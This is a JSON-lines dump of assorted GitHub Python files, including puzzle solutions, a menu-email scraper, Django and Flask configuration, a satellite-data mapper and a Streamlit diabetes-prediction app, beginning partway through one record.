', move)\n\n\nwhile True:\n \n window.update()\n\n","repo_name":"flosthch/flosthch.github.io","sub_path":"My/trojanischer_krieg/animi.py","file_name":"animi.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23385570389","text":"import pytest\n\n\n@pytest.mark.parametrize(\"mass, fuel\", [\n (12, 2),\n (14, 2),\n (1969, 654),\n (100756, 33583),\n (2, 0),\n])\ndef test_required_fuel(mass, fuel):\n assert required_fuel(mass) == fuel\n\n\ndef required_fuel(mass):\n return max(0, mass // 3 - 2)\n\n\ndef part1(values):\n return sum(required_fuel(mass) for mass in values)\n\n\n@pytest.mark.parametrize(\"mass, fuel\", [\n (14, 2),\n (1969, 966),\n (100756, 50346),\n])\ndef test_required_fuel_taking_fuel_mass_into_account(mass, fuel):\n assert required_fuel_taking_fuel_mass_into_account(mass) == fuel\n\n\ndef required_fuel_taking_fuel_mass_into_account(mass):\n extra_mass = []\n while True:\n mass = required_fuel(mass)\n if mass == 0:\n break\n extra_mass.append(mass)\n return sum(extra_mass)\n\n\ndef part2(values):\n return sum(required_fuel_taking_fuel_mass_into_account(mass) for mass in values)\n\n\nif __name__ == '__main__':\n with open(\"day01.txt\") as file_:\n values = [int(line) for line in file_]\n print(\"Part 1:\", part1(values))\n print(\"Part 2:\", part2(values))\n","repo_name":"ronnix/jeux-de-programmation","sub_path":"04-advent-of-code-2019/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"30980895617","text":"import datetime as dt\nimport time\nimport smtplib\nimport requests\nfrom bs4 import BeautifulSoup\nfrom unicodedata import normalize\nwhile True:\n url = 'https://wlu.campusdish.com/en/LocationsAndMenus/FreshFoodCompany'\n ffc_r = requests.get(url)\n ffc_soup = BeautifulSoup(ffc_r.text, 'html.parser')\n all = ffc_soup.findAll('a', attrs={'class':'viewItem'})\n list_menu = \"\"\n for name in ffc_soup.findAll('a', attrs={'class':'viewItem'}):\n list_menu = list_menu + str(name.text) + \", \"\n email_user = \"*EMAIL GOES HERE*\"\n server = smtplib.SMTP (\"smtp.gmail.com\", 587) \n server.ehlo()\n server.starttls()\n server.login('#EMAILGOES HERE#', '#PASSWORD GOES HERE')\n message = normalize('NFKD', list_menu).encode('ASCII', 'ignore')\n server.sendmail(email_user, email_user, message)\n server.quit()\n time.sleep(60*360)\n \n\n","repo_name":"Arnav1200/Dining-Hall-Menu-Notifier","sub_path":"notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28157474307","text":"from flask import Blueprint, jsonify, request\n\nrecommendations_bp = Blueprint('recommendations', __name__)\n\ndocuments = [\n {'id': 1, 'title': 'Introduction to Machine Learning', 'author': 'John Smith', 'content': 'Machine learning is a subfield of artificial intelligence...'},\n {'id': 2, 'title': 'Quantum Computing: A Brief Overview', 'author': 'Jane Doe', 'content': 'Quantum computing is an emerging field...'},\n {'id': 3, 'title': 'The CRISPR Revolution', 'author': 'Bob Johnson', 'content': 'CRISPR is a revolutionary gene-editing technology...'},\n]\n\n# API to generate recommended similar documents based on a document sent in the POST request\n@recommendations_bp.route('/', methods=['POST'])\ndef generate_recommendations():\n document = request.json\n # Example recommendation generation algorithm\n recommendations = [d for d in documents if d['author'] == document['author'] and d['id'] != document['id']]\n return jsonify({'recommendations': recommendations}), 200\n\n# API to retrieve the recommended similar documents generated by the previous API\n@recommendations_bp.route('/', methods=['GET'])\ndef get_recommendations():\n # Example of how to retrieve previously generated recommendations\n recommendations = [{'id': 2, 'title': 'Quantum Computing: A Brief Overview', 'author': 'Jane Doe', 'content': 'Quantum computing is an emerging field...'},\n {'id': 3, 'title': 'The CRISPR Revolution', 'author': 'Bob Johnson', 'content': 'CRISPR is a revolutionary gene-editing technology...'}]\n return jsonify({'recommendations': recommendations}), 200\n","repo_name":"barotjay998/game-of-papers","sub_path":"app/api/recommendations.py","file_name":"recommendations.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27056836598","text":"import os.path\n\nfrom configurations import Configuration, values\n\n\nclass Common(Configuration):\n\n VERSION = values.Value('0.0.0-x', environ_prefix='ID')\n SITE_NAME = values.Value('OCCRP ID', environ_prefix='ID')\n\n INSTALLED_APPS = (\n 'django.contrib.contenttypes',\n 'django.contrib.auth',\n 'django.contrib.sessions',\n\n # Third party apps\n 'rest_framework',\n 'corsheaders',\n 'django_filters',\n 'social_django',\n 'activity',\n 'djmoney',\n 'django_bleach',\n\n # Your apps\n 'api_v3',\n\n )\n\n MIDDLEWARE = (\n 'django.middleware.security.SecurityMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n )\n\n ALLOWED_HOSTS = [\"*\"]\n ROOT_URLCONF = 'api_v3.urls'\n SECRET_KEY = values.SecretValue()\n WSGI_APPLICATION = 'api_v3.wsgi.application'\n USE_X_FORWARDED_HOST = True\n SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n SESSION_COOKIE_SECURE = True\n\n ROUTER_CLASS = 'rest_framework.routers.DefaultRouter'\n\n # Email, defaults to in-memory backend, switch to `console` for development\n EMAIL = values.EmailURLValue('locmem://')\n DEFAULT_FROM_EMAIL = values.EmailValue(\n '', environ_prefix='ID', environ_required=True)\n DEFAULT_FROM = '{} <{}>'.format(SITE_NAME, DEFAULT_FROM_EMAIL)\n DEFAULT_NOTIFY_EMAILS = values.ListValue([], environ_prefix='ID')\n\n ADMINS = []\n\n # Postgres\n DATABASES = values.DatabaseURLValue(\n 'postgres://postgres:postgres@postgres:5432/postgres')\n QUEUE_DATABASE_URL = values.Value(\n 'postgres://postgres:postgres@postgres:5432/postgres',\n environ_name='QUEUE_DATABASE_URL', environ_prefix='')\n\n # CORS\n CORS_ALLOW_CREDENTIALS = True\n CORS_ORIGIN_WHITELIST = values.ListValue(['http://localhost:8000'])\n CORS_ORIGIN_ALLOW_ALL = values.BooleanValue(False)\n\n # Misc\n EXPENSE_SCOPES = values.ListValue([], environ_prefix='ID')\n MEMBER_CENTERS = values.ListValue([], environ_prefix='ID')\n\n # General\n APPEND_SLASH = False\n TIME_ZONE = 'UTC'\n LANGUAGE_CODE = 'en-us'\n # If you set this to False, Django will make some optimizations so as not\n # to load the internationalization machinery.\n USE_I18N = False\n USE_L10N = False\n USE_TZ = False\n\n # Sanitization\n BLEACH_ALLOWED_TAGS = []\n BLEACH_ALLOWED_ATTRIBUTES = []\n BLEACH_STRIP_TAGS = True\n BLEACH_STRIP_COMMENTS = True\n\n # Media files: max. 
size of 500MB\n MEDIA_ROOT = values.Value(\n environ_name='MEDIA_ROOT', environ_prefix='', environ_required=True)\n MAX_UPLOAD_SIZE = 1024 * 1024 * 500\n STATIC_URL = '/api/static/'\n\n DEBUG = values.BooleanValue(False)\n\n TEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'DIRS': [\n os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', 'templates')\n ),\n ],\n },\n ]\n\n # Logging\n LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n }\n }\n\n # Custom user app\n AUTH_USER_MODEL = 'api_v3.Profile'\n\n # Authentication\n AUTHENTICATION_BACKENDS = values.ListValue(\n [\n 'api_v3.misc.oauth2.KeycloakOAuth2',\n ]\n )\n SOCIAL_AUTH_KEYCLOAK_BASE = values.Value('', environ_prefix='')\n SOCIAL_AUTH_KEYCLOAK_KEY = values.Value('', environ_prefix='')\n SOCIAL_AUTH_KEYCLOAK_SECRET = values.Value('', environ_prefix='')\n SOCIAL_AUTH_NO_DEFAULT_PROTECTED_USER_FIELDS = values.BooleanValue(\n True, environ_prefix='')\n SOCIAL_AUTH_PROTECTED_USER_FIELDS = values.ListValue([], environ_prefix='')\n\n SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = values.Value('', environ_prefix='')\n SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = values.Value('', environ_prefix='')\n\n # Username is not used.\n SOCIAL_AUTH_USER_FIELDS = ['email']\n\n # See: http://python-social-auth.readthedocs.io/en/latest/pipeline.html\n SOCIAL_AUTH_PIPELINE = (\n 'social_core.pipeline.social_auth.social_details',\n 'social_core.pipeline.social_auth.social_uid',\n 'social_core.pipeline.social_auth.social_user',\n 'social_core.pipeline.social_auth.associate_by_email',\n 'social_core.pipeline.user.create_user',\n 'social_core.pipeline.social_auth.associate_user',\n 'social_core.pipeline.user.user_details',\n 'api_v3.misc.oauth2.activate_user',\n 'api_v3.misc.oauth2.map_email_to_subscriber',\n )\n\n # Django Rest Framework\n REST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.IsAuthenticated',\n ],\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.SessionAuthentication',\n )\n }\n\n # JSON API DRF\n JSON_API_FORMAT_FIELD_NAMES = 'dasherize'\n JSON_API_FORMAT_TYPES = 'dasherize'\n JSON_API_PLURALIZE_TYPES = True\n\n # Default job queue name\n QUEUE_NAME = values.Value('default', environ_prefix='')\n\n # Allows disabling the review emails\n REVIEWS_DISABLED = values.BooleanValue(False, environ_prefix='ID')\n","repo_name":"occrp/id-backend","sub_path":"api_v3/config/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
+{"seq_id":"44037007053","text":"import random\nimport sys\nimport math\n\n\ndef chooseItemFromNamedList(list, prompt):\n print(prompt)\n counter = 0\n for item in list:\n counter += 1\n print(str(counter) + \":\" + item.name)\n c = getInt(\"Choice: \", list.__len__())\n return list[c-1]\n\n\ndef getInt(prompt, max, min=1):\n while True:\n try:\n i = int(input(prompt))\n if max >= i >= min:\n return i\n else:\n print(\"Too small/Too big\")\n\n except:\n print(\"It must be an integer\")\n\n\ndef getFloat(prompt, max, min):\n while True:\n try:\n i = float(input(prompt))\n if max >= i >= min:\n return i\n else:\n print(\"Too small/Too big\")\n except:\n print(\"It must be a number\")\n\n\ndef getLetters(prompt):\n i = str(input(prompt))\n return i\n","repo_name":"Ccdiaz09/Hopeful","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"6214310535","text":"from dataset import folder_generator\nimport pandas as pd\nimport re\n\n\ndef create_methylation_dataset(folders, islands=None, filters=dict()):\n \"\"\"\n The function creates a pandas Dataframe where each row is a sample and each column is a CpG island. Only the islands\n passed as parameter are considered.\n :param folders: a list of string containing the folders where the files are\n :param islands: a list of CpG island\n :param filters: a dict where the key is the column and the value the value used to filter\n :return: a pandas Dataframe\n \"\"\"\n for path in folder_generator(folders, r'^jhu-usc\\..+txt$'):\n dataset = pd.read_csv(path, sep='\\t', na_values=\"NA\", index_col=0)\n dataset.dropna()\n if islands is not None:\n dataset = dataset.loc[islands]\n for col, value in filters.items():\n dataset = dataset[dataset[col] == value]\n filtered_islands = list(dataset.index.values)\n break\n\n new_dataset = pd.DataFrame(columns=filtered_islands+[\"barcode\"])\n count = 0\n for path in folder_generator(folders, r'^jhu-usc\\..+txt$'):\n try:\n dataset = pd.read_csv(path, sep='\\t', na_values=\"NA\", index_col=0)\n dataset = dataset[[\"Beta_value\"]].loc[filtered_islands].T.reset_index().drop(\"index\", axis=1)\n dataset.columns.name = None\n barcode = re.search(r'TCGA-[A-Z0-9]{2}-[A-Z0-9]{4}-[A-Z0-9]{3}-[A-Z0-9]{3}-[A-Z0-9]{4}-[A-Z0-9]{2}', path).group()\n dataset[\"barcode\"] = barcode\n new_dataset = new_dataset.append(dataset)\n count += 1\n print(count)\n except KeyError:\n print(\"Skipping file\")\n new_dataset = new_dataset.set_index(\"barcode\")\n print(new_dataset)\n new_dataset = new_dataset.dropna(axis=1)\n print()\n print(new_dataset)\n return new_dataset\n","repo_name":"TestaDiRapa/asimov","sub_path":"dataset/methylation450.py","file_name":"methylation450.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16033730519","text":"from pylibdmtx.pylibdmtx import decode\nfrom PIL import Image\nimport os\n\n\ndef get_barcode_info(picture_obj):\n\n\n BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n picture_path = BASE_DIR + os.path.normpath(picture_obj.image.url)\n result = decode(Image.open(picture_path))\n\n try:\n decode_data = str(result[0].data.decode('UTF-8'))\n return decode_data, picture_path\n\n except IndexError:\n return None, None\n","repo_name":"CesarRodriguezPro/InternationalConcreteTools","sub_path":"tools/data_processing/barcode_scanner.py","file_name":"barcode_scanner.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33342357978","text":"# Name: mapper_obpg_l3\n# Purpose: Mapping for L3 data from the OBPG web-site\n# Authors: Anton Korosov\n# Licence: This file is part of NANSAT. You can redistribute it or modify\n# under the terms of GNU General Public License, v.3\n# http://www.gnu.org/licenses/gpl-3.0.html\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\nimport datetime\nimport os.path\nimport glob\n\nimport numpy as np\n\nfrom nansat.utils import gdal, ogr\nfrom nansat.vrt import VRT\nfrom nansat.nsr import NSR\n\nfrom nansat.exceptions import WrongMapperError\n\nclass Mapper(VRT):\n ''' Mapper for Level-3 Standard Mapped Image from\n http://oceancolor.gsfc.nasa.gov'''\n\n # detect wkv from metadata 'Parameter'\n param2wkv = {'Chlorophyll a concentration': 'mass_concentration_of_chlorophyll_a_in_sea_water',\n 'Diffuse attenuation coefficient': 'volume_attenuation_coefficient_of_downwelling_'\n 'radiative_flux_in_sea_water',\n 'Remote sensing reflectance': 'surface_ratio_of_upwelling_radiance_emerging_from_'\n 'sea_water_to_downwelling_radiative_flux_in_air',\n 'CDOM Index': 'volume_absorption_coefficient_of_radiative_flux_in_sea_water_due_'\n 'to_dissolved_organic_matter',\n 'Sea Surface Salinity': 'sea_surface_salinity',\n 'Sea Surface Temperature': 'sea_surface_temperature',\n 'Instantaneous Photosynthetically Available Radiation': 'instantaneous_photosynthetically_available_radiation',\n 'Particle backscatter at 443 nm': 'volume_backscattering_coefficient_of_radiative_flux_in_sea_water_due_to_suspended_particles',\n 'Chlorophyll a concentration, Garver-Siegel-Maritorena Model': 'mass_concentration_of_chlorophyll_a_in_sea_water',\n 'Photosynthetically Available Radiation': 'downwelling_photosynthetic_photon_radiance_in_sea_water',\n 'Instantaneous Photosynthetically Available Radiation': 'instantaneous_downwelling_photosynthetic_photon_radiance_in_sea_water',\n }\n\n def __init__(self, filename, gdalDataset, gdalMetadata, **kwargs):\n ''' OBPG L3 VRT '''\n\n try:\n assert 'Level-3 Standard Mapped Image' in gdalMetadata['Title']\n except:\n raise WrongMapperError\n\n # get list of similar (same date) files in the directory\n iDir, iFile = os.path.split(filename)\n iFileName, iFileExt = os.path.splitext(iFile)\n simFilesMask = os.path.join(iDir, iFileName)\n simFiles = glob.glob(simFilesMask + iFileExt[0:6] + '*')\n #print 'simFilesMask, simFiles', simFilesMask, simFiles\n\n metaDict = []\n for simFile in simFiles:\n #print 'simFile', simFile\n # open file, get metadata and get parameter name\n simSupDataset = gdal.Open(simFile)\n if simSupDataset is None:\n # skip this similar file\n #print 'No dataset: %s not a supported SMI file' % simFile\n continue\n # get subdatasets from the similar file\n simSubDatasets = simSupDataset.GetSubDatasets()\n if len(simSubDatasets) > 0:\n for simSubDataset in simSubDatasets:\n #print 'simSubDataset', simSubDataset\n if 'l3m_data' in simSubDataset[1]:\n # get SourceFilename from subdataset\n tmpSourceFilename = simSubDataset[0]\n break\n else:\n # get SourceFilename from dataset\n tmpSourceFilename = simFile\n\n # open subdataset with GDAL\n #print 'tmpSourceFilename', tmpSourceFilename\n tmpGdalDataset = gdal.Open(tmpSourceFilename)\n\n try:\n # get metadata, get 'Parameter'\n tmpGdalMetadata = tmpGdalDataset.GetMetadata()\n simParameter = tmpGdalMetadata['Parameter']\n except:\n print('No parameter: %s not a supported SMI file')\n continue\n else:\n # set params of the similar file\n simSourceFilename = 
tmpSourceFilename\n simGdalDataset = tmpGdalDataset\n simGdalMetadata = tmpGdalMetadata\n\n # get WKV from the similar file\n #print 'simParameter', simParameter\n for param in self.param2wkv:\n #print 'param', param\n if param in simParameter:\n simWKV = self.param2wkv[param]\n break\n\n # generate entry to metaDict\n metaEntry = {'src': {'SourceFilename': simSourceFilename,\n 'SourceBand': 1,\n 'ScaleRatio': float(simGdalMetadata['Slope']),\n 'ScaleOffset': float(simGdalMetadata['Intercept'])},\n 'dst': {'wkv': simWKV}}\n\n # add wavelength and BandName\n if ' at ' in simParameter and ' nm' in simParameter:\n simWavelength = simParameter.split(' at ')[1].split(' nm')[0]\n metaEntry['dst']['suffix'] = simWavelength\n metaEntry['dst']['wavelength'] = simWavelength\n\n # add band with Rrsw\n metaEntry2 = None\n if simWKV == 'surface_ratio_of_upwelling_radiance_emerging_from_sea_water_to_downwelling_radiative_flux_in_air':\n metaEntry2 = {'src': [metaEntry['src']]}\n metaEntry2['dst'] = {'wkv': 'surface_ratio_of_upwelling_radiance_emerging_from_sea_water_to_downwelling_radiative_flux_in_water',\n 'suffix': simWavelength,\n 'wavelength': simWavelength,\n 'PixelFunctionType': 'NormReflectanceToRemSensReflectance',\n }\n\n # append entry to metaDict\n metaDict.append(metaEntry)\n if metaEntry2 is not None:\n metaDict.append(metaEntry2)\n\n #get array with data and make 'mask'\n a = simGdalDataset.ReadAsArray()\n mask = np.zeros(a.shape, 'uint8') + 64\n mask[a < -32000] = 1\n self.band_vrts = {'mask': VRT(array=mask)}\n\n metaDict.append(\n {'src': {'SourceFilename': self.band_vrts['mask'].filename,\n 'SourceBand': 1},\n 'dst': {'name': 'mask'}})\n\n # create empty VRT dataset with geolocation only\n # print 'simGdalMetadata', simGdalMetadata\n latitudeStep = float(simGdalMetadata.\n get('Latitude Step',\n simGdalMetadata.get('Latitude_Step', 1)))\n longitudeStep = float(simGdalMetadata.\n get('Longitude Step',\n simGdalMetadata.get('Longitude_Step', 1)))\n numberOfColumns = int(simGdalMetadata.\n get('Number of Columns',\n simGdalMetadata.get('Number_of_Columns', 1)))\n numberOfLines = int(simGdalMetadata.\n get('Number of Lines',\n simGdalMetadata.get('Number_of_Lines', 1)))\n #longitudeStep = float(simGdalMetadata['Longitude Step'])\n # x_size, y_size, geo_transform, projection, gcps=None, gcp_projection='', **kwargs\n self._init_from_dataset_params(numberOfColumns, numberOfLines,\n (-180.0, longitudeStep, 0.0, 90.0, 0.0, -longitudeStep),\n NSR().wkt)\n\n # add bands with metadata and corresponding values to the empty VRT\n self.create_bands(metaDict)\n\n # Add valid time\n startYear = int(simGdalMetadata.get('Start Year',\n simGdalMetadata.\n get('Start_Year', 1)))\n startDay = int(simGdalMetadata.get('Start Day',\n simGdalMetadata.\n get('Start)Day', 1)))\n self.dataset.SetMetadataItem('time_coverage_start',\n (datetime.datetime(startYear, 1, 1) +\n datetime.timedelta(startDay)).isoformat())\n","repo_name":"nansencenter/nansat","sub_path":"nansat/mappers/mapper_obpg_l3.py","file_name":"mapper_obpg_l3.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"61"}
+{"seq_id":"38543932834","text":"import streamlit as st\nimport pandas as pd\nimport altair as alt\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nst.set_page_config(layout='wide',page_title='Prediksi Diagnostik Penyakit Diabetes')\n\ndf = pd.read_csv('https://docs.google.com/spreadsheets/d/e/2PACX-1vRW-2rCgMoo9glcRfoAAZHUIgQpyb4sXv9DATBsQoihLtBbCo-p_BUwfrNcaq8OCCOe2ZhS0mVOvkR-/pub?gid=1879661496&single=true&output=csv')\n\n#########################################################################\n#DATA PREPROCESSING\n\n#Handling Outlier\ndf['Pregnancies']=df.Pregnancies.mask(df.Pregnancies == 0, df['Pregnancies'].mean())\ndf['Pregnancies']=df.Pregnancies.mask(df.Pregnancies > 12, df['Pregnancies'].mean())\ndf['Glucose']=df.Glucose.mask(df.Glucose == 0, df['Glucose'].mean())\ndf['BloodPressure']=df.BloodPressure.mask(df.BloodPressure == 0, df['BloodPressure'].mean())\ndf['BloodPressure']=df.BloodPressure.mask(df.BloodPressure < 40, df['BloodPressure'].mean())\ndf['BloodPressure']=df.BloodPressure.mask(df.BloodPressure > 105, df['BloodPressure'].mean())\ndf['BMI']=df.BMI.mask(df.BMI == 0, df['BMI'].mean())\ndf['BMI']=df.BMI.mask(df.BMI > 48, df['BMI'].mean())\n\n#Select column based on correlation\ndf = df.drop(['SkinThickness','Insulin','BloodPressure','DiabetesPedigreeFunction'],axis=1)\n\n#machinelearning\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\ny = df.iloc[:,-1]\nx = df.iloc[:,0:-1]\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2,train_size=0.8,random_state=0)\n#Logistic Regression\nlr = LogisticRegression()\nlr.fit(x_train,y_train)\ny_pred_lr = lr.predict(x_test)\n#########################################################################\n#FRONTEND\n\nst.title('Prediksi Diagnostik Penyakit Diabetes')\n\naboutdata=(\"\"\"\n \n Kumpulan data ini berasal dari National Institute of Diabetes and Digestive and Kidney Diseases . Tujuan dari kumpulan data ini adalah untuk memprediksi secara diagnostik apakah seorang pasien menderita diabetes, berdasarkan pengukuran diagnostik tertentu yang termasuk dalam kumpulan data. 2 Dari kumpulan data dalam File (.csv) dapat ditemukan beberapa variabel, beberapa di antaranya independent (beberapa variabel prediktor medis) dan hanya satu variabel dependent target (Hasil/Outcome ).\n
\n\"\"\")\n\nlatarbelakang = (\"\"\"\n \n Penyakit diabetes memiliki urgensi yang tinggi di Indonesia. Berdasarkan data dari Kementerian Kesehatan Indonesia pada tahun 2020, prevalensi diabetes di Indonesia terus mengalami peningkatan yang signifikan. Berikut adalah beberapa statistik terkait urgensi penyakit diabetes di Indonesia : \n \n - Prevalensi Diabetes: Menurut data Riskesdas 2018 (Riset Kesehatan Dasar), prevalensi diabetes di Indonesia pada tahun tersebut adalah sekitar 10,7% . Artinya, sekitar 10,7 dari 100 orang di Indonesia memiliki diabetes . \n \n - Jumlah Penderita Diabetes: Diperkirakan ada sekitar 10-11 juta orang di Indonesia yang telah didiagnosis menderita diabetes. Namun, terdapat juga banyak kasus diabetes yang belum terdiagnosis atau belum diketahui .\n
\n\"\"\")\n\nlatbel, tendat = st.columns(2)\n\nwith latbel:\n st.header('Tentang Data')\n st.write(aboutdata, unsafe_allow_html=True)\nwith tendat:\n st.header('Latar Belakang')\n st.write(latarbelakang, unsafe_allow_html=True)\n\nst.header('Data Insight')\ndatafram, corrcol = st.columns(2)\nwith datafram:\n st.dataframe(df, use_container_width=True)\nwith corrcol:\n fig, ax = plt.subplots(figsize=(5,2.5))\n sns.heatmap(df.corr(), annot=True)\n st.pyplot(fig,use_container_width=True)\n\ndiabetespositive = df['Outcome'].loc[df['Outcome'] == 1].count()\npercpositive = df['Outcome'].loc[df['Outcome'] == 1].count()/df['Outcome'].count()\ndiabetesnegative = df['Outcome'].loc[df['Outcome'] == 0].count()\npercnegative = df['Outcome'].loc[df['Outcome'] == 0].count()/df['Outcome'].count()\n\nmodemode = df.loc[df['Outcome'] == 1]\nmodeage = modemode['Age'].mode().values[0]\n\nmx_positive, mx_negative, mx_age = st.columns(3)\n\nwith mx_positive:\n st.metric(\n \"Positif Diabetes (Jumlah)\",\n value= diabetespositive\n )\nwith mx_negative:\n st.metric(\n \"Negatif Diabetes (Jumlah)\",\n value= diabetesnegative\n )\nwith mx_age:\n st.metric(\n \"Umur dominan penderita diabetes\",\n value= f'{modeage} Tahun'\n )\n\nfakta = (\"\"\"\n \n Fakta : Berdasarkan heatmap korelasi di atas, Atribut yang paling berpengaruh dalam proses pembuatan proyek ini adalah atribut Glukosa yang artinya Glukosa merupakan faktor utama penyebab Diabetes itu sendiri. \n
\n\"\"\")\n\nst.write(fakta,unsafe_allow_html=True)\n\nst.header('Grafik Penderita Diabetes')\n\nagecount = df.groupby(['Age','Outcome']).size().reset_index(name='count')\nagecount['Outcome'] = agecount['Outcome'].replace(0,'Negative').replace(1,'Positive')\ncustom_colors = alt.Scale(domain=['Negative', 'Positive'], range=['#38B000', '#E63946'])\n\ndiabetesbar = alt.Chart(agecount).mark_bar().encode(\n alt.X('Age',title=\"Age\"),\n alt.Y('count',title='Amount'),\n alt.Color('Outcome',scale=custom_colors),\n )\n\nst.altair_chart(diabetesbar, use_container_width=True)\n\nst.header('Grafik Status Diabetes per Umur')\n\nages = df['Age'].unique()\n\nageselect = st.selectbox(\"Umur (berdasarkan data yang ada di database)\",sorted(ages))\n\nbasedperage = agecount.loc[agecount['Age'] == int(ageselect)]\n\ndiabetesbarperage = alt.Chart(basedperage).mark_bar().encode(\n alt.X('Age',title=\"Age\"),\n alt.Y('count',title='Amount'),\n alt.Color('Outcome',scale=custom_colors),\n alt.Column('Outcome', header=alt.Header(title='Outcome'))\n ).properties(\n width=100,\n height=200\n )\n\nst.altair_chart(diabetesbarperage)\n\ntool, insight = st.columns(2)\n\nwith tool :\n st.header('Alat Pendeteksi Diabetes (Diagnostik)')\n\n import numpy as np\n preg = st.number_input('Berapa kali hamil : ', 0,20)\n glu = st.number_input('Level glukosa dalam darah : ',0,300)\n bmi = st.number_input('Indeks Massa Tubuh (IMT) : ',0,50)\n age = st.number_input('Umur : ',0,120)\n\n negatif = (\"\"\"\n \n Anda NEGATIF mengalami penyakit Diabetes\n
\n \"\"\")\n positif = (\"\"\"\n \n Anda POSITIF mengalami penyakit Diabetes\n
\n \"\"\")\n\n try:\n pregt = float(preg)\n glut = float(glu)\n bmit = float(bmi)\n aget = int(age)\n demo = np.array([pregt,glut,bmit,aget])\n demo = demo.reshape(1,-1)\n pred = lr.predict(demo)\n pred = pred.reshape(-1,1)\n if st.button('Enter') : \n if pred[0] == 0:\n st.write(negatif,unsafe_allow_html=True)\n elif pred[0] == 1:\n st.write(positif,unsafe_allow_html=True)\n else:\n st.write('')\n except ValueError:\n st.write(\"Harap memberikan data secara tepat!\")\n\n from sklearn.metrics import accuracy_score\n\n st.write(\"Akurasi Model (Logistic Regression) :\\n\",round(accuracy_score(y_test,y_pred_lr),2))\n\n caption = (\"\"\"\n \n Penting! : Model ini adalah alat DIAGNOSTIK untuk mendeteksi diabetes saja. Disarankan untuk berkonsultasi ke dokter untuk mendapatkan hasil yang lebih akurat. \n
\n \"\"\")\n\n st.caption(caption,unsafe_allow_html=True)\nwith insight :\n st.header('Nilai Sehat')\n caption2 = (\"\"\"\n \n Berikut merupakan nilai normal dari atribut pemicu diabetes yang perlu diperhatikan agar tidak terkena penyakit diabetes. \n\n NILAI DI BAWAH INI BERDASARKAN DATA YANG ADA PADA DATABASE \n
\n \"\"\")\n avgglu = round(df['Glucose'].loc[df['Outcome'] == 0].mean(),2)\n avgBMI = round(df['BMI'].loc[df['Outcome'] == 0].mean(),2)\n avgpreg = round(df['Pregnancies'].loc[df['Outcome'] == 0].mean())\n nilainormal = (f\"\"\"\n \n Glukosa : {avgglu} \n \n Indeks Massa Tubuh : {avgBMI} \n \n Jumlah Kehamilan : {avgpreg} kali \n
\n \"\"\")\n st.caption(caption2,unsafe_allow_html=True)\n st.write (nilainormal,unsafe_allow_html=True)\n","repo_name":"barjej/diabetespred","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8454,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23559578481","text":"#!/usr/bin/env python3\n\nimport sys\n\n\ndef is_tidy(n):\n prev = -1\n for c in map(int, str(n)):\n if c < prev:\n return False\n prev = c\n return True\n\n\ndef solve(N):\n for n in range(N, -1, -1):\n if is_tidy(n):\n return n\n assert(False)\n\n\nif __name__ == \"__main__\":\n input_filepath = sys.argv[1]\n\n with open(input_filepath, \"rt\") as input_file:\n T = int(next(input_file))\n\n for i in range(1, T + 1):\n N = int(next(input_file))\n print(\"Case #%u: %s\" % (i, solve(N)))\n\n assert(i == T)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3769.py","file_name":"3769.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
